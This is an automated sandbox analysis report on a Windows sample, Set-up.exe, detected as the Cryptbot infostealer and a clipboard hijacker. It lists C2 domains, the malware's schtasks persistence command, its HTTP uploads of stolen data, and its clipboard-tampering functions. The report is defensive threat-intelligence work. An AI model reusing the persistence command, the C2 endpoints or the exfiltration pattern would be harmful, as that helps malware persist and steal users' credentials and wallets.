Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1521577
MD5:	d9bdb4ba2a45c67f4da4e431ff988605
SHA1:	4cdd27ca0a92a35e5eea6e588422339bdd9b05ba
SHA256:	9e61196ade3f31620d62422741e66bd19f0bd4744e2f6a5f8a2481cfb8f9b9d9
Tags:	exeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: D9BDB4BA2A45C67F4DA4E431FF988605)

service123.exe (PID: 332 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 374EA50194727C58BB86AD240B785CB6)

schtasks.exe (PID: 1216 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 3428 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 374EA50194727C58BB86AD240B785CB6)

service123.exe (PID: 2596 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 374EA50194727C58BB86AD240B785CB6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["+elevenvh11pt.top", "11pt.top", "@elevenvh11pt.top", "elevenvh11pt.top", "analforeverlovyu.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2307441720.0000000003F99000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7100	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 7100	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 332	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.service123.exe.6c2c0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7100, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 1216, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:45:17.911272+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49730	185.244.181.140	80	TCP
2024-09-29T00:45:21.333251+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49732	185.244.181.140	80	TCP
2024-09-29T00:45:26.200833+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49738	185.244.181.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.7100.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["+elevenvh11pt.top", "11pt.top", "@elevenvh11pt.top", "elevenvh11pt.top", "analforeverlovyu.top"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_006F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_6C2C14B0

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	4_2_006F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2E0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2EA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C39F990h	4_2_6C2DEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C2E4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C3684A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2EC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2EA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	4_2_6C360730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2E0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	4_2_6C31A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2E0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C39D014h]	4_2_6C394360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C337D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C333840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	4_2_6C2ED974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C319B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C2FBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C2FBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C33B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C2ED504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_6C339600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	4_2_6C2ED674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C39DFF4h	4_2_6C333690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	4_2_6C2ED7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C363140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C2DB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C2ED2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C357350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49732 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 185.244.181.140:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: +elevenvh11pt.top
Source: Malware configuration extractor	URLs: 11pt.top
Source: Malware configuration extractor	URLs: @elevenvh11pt.top
Source: Malware configuration extractor	URLs: elevenvh11pt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top

Source: Joe Sandbox View

IP Address: 185.244.181.140 185.244.181.140

Source: Joe Sandbox View

ASN Name: BELCLOUDBG BELCLOUDBG

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary33730321User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: elevenvh11pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary17398190User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89745Host: elevenvh11pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary32471747User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29706Host: elevenvh11pt.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: elevenvh11pt.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary33730321User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: elevenvh11pt.top

Source: Set-up.exe, 00000000.00000003.1838220618.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://elevenvh11pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2309002492.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://elevenvh11pt.top/v1/upload.phpP
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HXocObpYbsjxnCpoVLwZ.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C2D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

4_2_6C2D9C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		4_2_6C2D9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		4_2_6C2D9D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C2D9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_6C2D9E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Set-up.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F51B0	4_2_006F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_006F3E20	4_2_006F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C302CCE	4_2_6C302CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2CCD00	4_2_6C2CCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2CEE50	4_2_6C2CEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D0FC0	4_2_6C2D0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C310AC0	4_2_6C310AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D44F0	4_2_6C2D44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3046E0	4_2_6C3046E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3007D0	4_2_6C3007D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F87C0	4_2_6C2F87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C310060	4_2_6C310060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C302090	4_2_6C302090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F2360	4_2_6C2F2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C31DC70	4_2_6C31DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D5880	4_2_6C2D5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F98F0	4_2_6C2F98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C307A20	4_2_6C307A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30DBEE	4_2_6C30DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30140E	4_2_6C30140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C311510	4_2_6C311510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30F610	4_2_6C30F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2EF760	4_2_6C2EF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C3000	4_2_6C2C3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3850D0	4_2_6C3850D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D70C0	4_2_6C2D70C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C395980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C393560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C393B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C38ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3936E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C393820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C395A70 appears 77 times

Source: Set-up.exe, 00000000.00000002.2324509023.0000000001473000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\fvDNEDWLqd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\cyUfSaAVoKrgDgBDsopT

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: hxocobpybsjxncpovlwz.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
